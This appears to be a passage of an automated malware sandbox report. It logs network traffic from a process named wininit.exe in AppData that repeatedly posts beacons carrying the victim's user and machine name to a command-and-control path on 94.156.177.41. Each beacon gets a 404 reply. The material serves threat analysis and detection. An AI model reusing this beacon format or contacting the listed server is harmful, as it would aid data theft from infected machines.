                                                Nov 20, 2024 10:12:00.062552929 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:00.919509888 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:00 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.224919894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:01.076596975 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:01.086240053 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:01.961283922 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:01 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.224919994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:02.128051996 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:02.135571957 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:03.001914978 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:02 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.224920094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:03.148977041 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:03.154170990 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:04.030916929 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.224920194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:04.176157951 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:04.183469057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:05.064814091 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:04 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.224920294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:05.216603041 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:05.221729994 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:05.957222939 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:05 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.224920394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:06.095170975 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:06.101870060 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:06.846041918 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:06 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.224920494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:06.986717939 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:06.992362022 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:07.734381914 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:07 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.224920594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:07.873225927 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:07.878232956 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:08.610301018 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:08 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.224920694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:08.751954079 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:08.762365103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:09.486146927 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:09 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.224920794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:09.632071972 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:09.636982918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:10.488801956 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:10 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.224920894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:10.647221088 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:10.655009031 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:11.403486013 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:11 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.224920994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:11.543548107 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:11.548573017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:12.422246933 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:12 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.224921094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:12.578279018 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:12.583478928 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:13.483566999 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:13 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.224921194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:13.629894972 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:13.635351896 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:14.380477905 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:14 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.224921294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:14.663448095 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:14.668489933 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:15.543117046 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:15 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.224921394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:15.687622070 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:15.692785978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:16.542809010 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:16 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.2.224921494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:16.703167915 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:16.709953070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:17.576167107 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:17 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.2.224921594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:17.731513023 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:17.740345955 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:18.599451065 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:18 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.224921694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:19.470042944 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:19.475028992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:20.249712944 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:20 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.224921794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:20.383630037 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
